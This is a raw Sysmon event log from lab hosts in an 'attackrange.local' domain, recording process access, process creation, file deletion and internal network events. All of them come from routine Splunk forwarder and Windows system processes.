09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981395Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981394Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8DCA-6151-1D7A-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981393Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DCA-6151-1D7A-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981392Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.944{69CF5F33-8DCA-6151-1D7A-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981391Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.941{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7780F72ECB4C441BC3D0B860618E021D,SHA256=5535FA682FDDD9643DA55D77C6476CCBD1D37B53400D27B4089B532850D9770B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981390Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.754{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3441E9EC86ED3903B475F4CC588D214A,SHA256=FEC91EFD22D40402007A3D4999A80400C9682A591FC1766303084185888973E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981389Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.754{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E75DA2EC28338B005510852396128891,SHA256=73D6B9EF33F2EF5D7B2AD3A98CB459322A9A72D1E2978E1856BF6FE08FEC126C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981388Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:23.642{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59547-false10.0.1.12-8000- 10341000x8000000000000000981387Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.566{69CF5F33-8DCA-6151-1C7A-00000000FD01}34721316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981386Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DCA-6151-1C7A-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981385Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981384Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981383Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981382Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981381Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981380Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981379Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981378Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981377Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.363{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981376Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.363{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8DCA-6151-1C7A-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981375Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.363{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DCA-6151-1C7A-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981374Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.364{69CF5F33-8DCA-6151-1C7A-00000000FD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000981373Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.962{69CF5F33-8DC9-6151-1B7A-00000000FD01}11204024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981419Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.973{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3441E9EC86ED3903B475F4CC588D214A,SHA256=FEC91EFD22D40402007A3D4999A80400C9682A591FC1766303084185888973E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:27.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C82099FF87B48F31F73340552154A20,SHA256=F94DE474DE026E35BA432EC090E472D49B1625A6AC81C552435BAB33EC9467D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:25.116{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54247-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000981418Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.816{69CF5F33-8DCB-6151-1E7A-00000000FD01}32481924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981417Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DCB-6151-1E7A-00000000FD01}3248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981416Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981415Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:27.645{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981414Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 